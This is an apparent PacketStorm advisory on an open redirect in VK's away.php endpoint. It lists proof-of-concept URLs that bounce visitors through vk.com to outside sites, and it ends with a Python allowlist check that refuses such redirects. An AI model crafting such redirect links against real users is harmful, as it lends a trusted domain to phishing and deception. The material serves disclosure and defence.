Praetorian503

VK Social Network Open Redirect


The VK social network at vk.com suffers from an open redirection vulnerability.

+++++++++++

# Exploit Title :VK (social network) URL Redirector Abuse

# *Vendor*: www.vk.com

# Author: Juan Carlos García (NightSec)

# Blog: http://hackingmadrid.blogspot.com



# Facebook http://www.facebook.com/pages/ETHICAL-HACKING-Y-OL%C3%89-by-the-Face-WhiteHat/172393869485449?sk=app_190322544333196



*************************************************************************************

BRIEF DESCRIPTION

**************************************************************************************

VK (Originally VKontakte, Russian: ВКонтакте) is a European social network service popular among Russian-speaking users around the world. It is especially popular in Russia, Ukraine, Kazakhstan, Moldova, Belarus, and Israel. VK is a Facebook clone, with several common features, such as university exclusiveness of a network during its early stages, similar color, and similar features and functionality. VK is able to hold the position, the main countries, and successfully move ahead in Europe and America, despite efforts of the American network. Like other social networks, VK allows users to message contacts publicly or privately, create groups, public pages and events, share and tag images, audio and video, and play browser-based games.



*********************************

*********************************



URL Redirector Abuse



PoC



http://vk.com/away.php?mt=8&to=http://hackingmadrid.blogspot.com



http://vk.com/away.php?locale=ru_RU&to=http://google.com/search?q=Hackingmadrid



http://vk.com/away.php?locale=ru_RU&to=http://google.com/search?q=Ethical Hacking y ole by the face



http://vk.com/away.php?feature=share&post=193_594&to=http://www.hackingmadrid.blogspot.com



http://vk.com/away.php?to=http://hackingmadrid.blogspot.com



http://vk.com/away.php?to=http://www.facebook.com/pages/ETHICAL-HACKING-Y-OL%C3%89-by-the-Face-WhiteHat/172393869485449?sk=app_190322544333196



http://vk.com/away.php?mt=8&post=-43583105_11&to=http://www.owasp.org



Procedure: Open the link given above





**************************************************************************

Give special thanks to all the people who follow me on Ethical Hacking and Ole by the Face .. Thanks guys



*************************************************************************************



Source: PacketStorm
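
A server-side check that would refuse the redirects listed in the PoC, as an added example (not code from the advisory or from VK): the `to` value is followed only when it parses to an http(s) URL whose host is on an allowlist. The function name, the allowlist contents and the fallback path are assumptions made for illustration.

```python
from urllib.parse import urlsplit, parse_qs

# Assumption: the only hosts this redirector may send a browser to directly.
ALLOWED_HOSTS = {"vk.com"}
FALLBACK = "/"  # assumed landing path when the target is refused


def safe_redirect_target(request_url, allowed=ALLOWED_HOSTS):
    """Return the `to` parameter if it is an allowlisted http(s) URL, else FALLBACK."""
    values = parse_qs(urlsplit(request_url).query).get("to", [])
    if len(values) != 1:  # missing or repeated parameter
        return FALLBACK
    target = values[0].strip()
    # Browsers treat backslashes and control characters differently from
    # urlsplit, so refuse them rather than guess how they will be read.
    if "\\" in target or any(ord(c) < 0x20 for c in target):
        return FALLBACK
    try:
        parts = urlsplit(target)
        host = (parts.hostname or "").lower().rstrip(".")
    except ValueError:  # e.g. a malformed IPv6 literal in the host
        return FALLBACK
    # A scheme-less ("//host") or non-web scheme target is never followed,
    # and the host must match exactly: no suffix or substring matching.
    if parts.scheme not in ("http", "https") or host not in allowed:
        return FALLBACK
    return target


if __name__ == "__main__":
    samples = (
        # Two links from the advisory's PoC list.
        "http://vk.com/away.php?mt=8&to=http://hackingmadrid.blogspot.com",
        "http://vk.com/away.php?mt=8&post=-43583105_11&to=http://www.owasp.org",
        # Constructed same-site link, for contrast.
        "http://vk.com/away.php?to=https://vk.com/feed",
    )
    for url in samples:
        print(url, "->", safe_redirect_target(url))
```

Sites that must link to arbitrary external hosts usually replace the silent redirect with an interstitial page that shows the destination; the same parsing applies before the link is rendered.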
